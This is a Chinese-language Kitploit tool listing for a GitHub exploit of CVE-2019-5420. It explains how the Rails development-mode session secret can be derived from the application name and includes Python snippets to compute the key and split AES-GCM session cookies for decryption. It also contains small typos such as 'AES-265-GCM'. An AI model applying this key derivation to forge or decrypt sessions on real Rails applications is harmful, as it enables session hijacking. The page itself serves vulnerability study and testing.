Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-5420 — 一个漏洞可能允许攻击者猜测自动生成的开发模式秘密令牌。 | Kitploit
工具/GitHubGitHub/j4k0m/cve-2019-5420
加密/解密工具密码攻击漏洞分析Web应用程序漏洞利用渗透测试
GitHubj4k0m/cve-2019-5420

CVE-2019-5420

一个漏洞可能允许攻击者猜测自动生成的开发模式秘密令牌。

查看仓库
5125年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-5420

此漏洞可允许攻击者猜测自动生成的开发模式秘密令牌。

当 Ruby-on-Rails 运行在开发模式时。在开发模式下,攻击者有可能猜测用于保护会话的密钥。

解密:

密钥生成:

Rails 使用三个环境(development,test,production),当应用使用开发模式时,你能够猜测秘密令牌并解密加密的会话。

用于保护会话的密钥是从应用名称派生出来的。

示例:

root@kitploit:~
rails new Jakom

Jakom:应用名称。

因此,我们可以猜测密钥是生成方法的输出:

root@kitploit:~
PKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]

如下所示:

root@kitploit:~
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)

使用密钥解密会话:

在 Rails 中,会话使用 AES-265-GCM 加密,如果你拥有密钥,就可以解密/加密会话。

最后你需要知道会话的格式:

root@kitploit:~
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]

解密示例:

如下所示:

root@kitploit:~
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")

会话 cookie 的第一部分是加密数据,第二部分是 IV,第三部分是 GCM 标签(认证标签)。 有了这些信息,我们可以直接解密我们的会话: image

示例:

image

下载工具